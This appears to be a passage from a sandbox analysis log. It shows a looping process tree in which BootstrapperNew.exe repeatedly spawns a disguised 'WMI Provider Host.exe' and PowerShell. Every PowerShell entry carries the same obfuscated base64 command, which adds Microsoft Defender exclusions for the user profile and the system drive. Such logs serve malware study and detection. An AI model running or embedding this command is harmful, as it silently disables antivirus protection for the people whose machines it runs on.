        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        122⤵
        
        PID:6612
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        123⤵
        
        PID:2892
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        123⤵
        
        PID:8124
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        123⤵
        
        PID:6720
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        124⤵
        
        PID:7680
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        124⤵
        
        PID:5424
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        124⤵
        
        PID:5508
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        125⤵
        
        PID:6484
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        125⤵
        
        PID:7132
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        125⤵
        
        PID:6292
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        126⤵
        
        PID:1212
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        126⤵
        
        PID:6752
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        126⤵
        
        PID:6660
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        127⤵
        
        PID:7604
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        127⤵
        
        PID:6804
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        127⤵
        
        PID:8128
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        128⤵
        
        PID:7688
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        128⤵
        
        PID:6480
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        128⤵
        
        PID:7732
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        129⤵
        
        PID:5292
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        129⤵
        
        PID:2856
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        129⤵
        
        PID:6488
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        130⤵
        
        PID:2368
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        130⤵
        
        PID:2044
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        130⤵
        
        PID:5240
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        131⤵
        
        PID:7268
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        131⤵
        
        PID:5024
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        131⤵
        
        PID:3368
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        132⤵
        
        PID:7948
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        132⤵
        
        PID:6900
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        132⤵
        
        PID:6760
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        133⤵
        
        PID:1932
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        133⤵
        
        PID:7116
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        133⤵
        
        PID:7152
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        134⤵
        
        PID:1060
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        134⤵
        
        PID:6688
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        134⤵
        
        PID:6696
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        135⤵
        
        PID:5864
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        135⤵
        
        PID:5956
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        135⤵
        
        PID:6016
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        136⤵
        
        PID:4952
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        136⤵
        
        PID:5884
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        136⤵
        
        PID:3928
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        137⤵
        
        PID:7324
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        137⤵
        
        PID:2856
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        137⤵
        
        PID:7900
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        138⤵
        
        PID:7812
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        138⤵
        
        PID:5736
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        138⤵
        
        PID:5052
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        139⤵
        
        PID:5248
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        139⤵
        
        PID:3992
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        139⤵
        
        PID:624
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        140⤵
        
        PID:4772
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        140⤵
        
        PID:3064
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        140⤵
        
        PID:6008
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        141⤵
        
        PID:2184
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        141⤵
        
        PID:7964
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        141⤵
        
        PID:7396
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        142⤵
        
        PID:5704
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        142⤵
        
        PID:5732
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        142⤵
        
        PID:7208
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        143⤵
        
        PID:5260
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        143⤵
        
        PID:6620
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        143⤵
        
        PID:7500
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        144⤵
        
        PID:7668
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        144⤵
        
        PID:6420
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        144⤵
        
        PID:6844
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        145⤵
        
        PID:7656
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        145⤵
        
        PID:8176
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        145⤵
        
        PID:3432
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        146⤵
        
        PID:5756
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        146⤵
        
        PID:3236
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        146⤵
        
        PID:5164
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        147⤵
        
        PID:6772
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        147⤵
        
        PID:2576
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        147⤵
        
        PID:7204
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        148⤵
        
        PID:5808
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        148⤵
        
        PID:7536
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        148⤵
        
        PID:6088
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        149⤵
        
        PID:1432
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        149⤵
        
        PID:5748
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        149⤵
        
        PID:1664
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        150⤵
        
        PID:1392
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        150⤵
        
        PID:4976
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        150⤵
        
        PID:7864
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
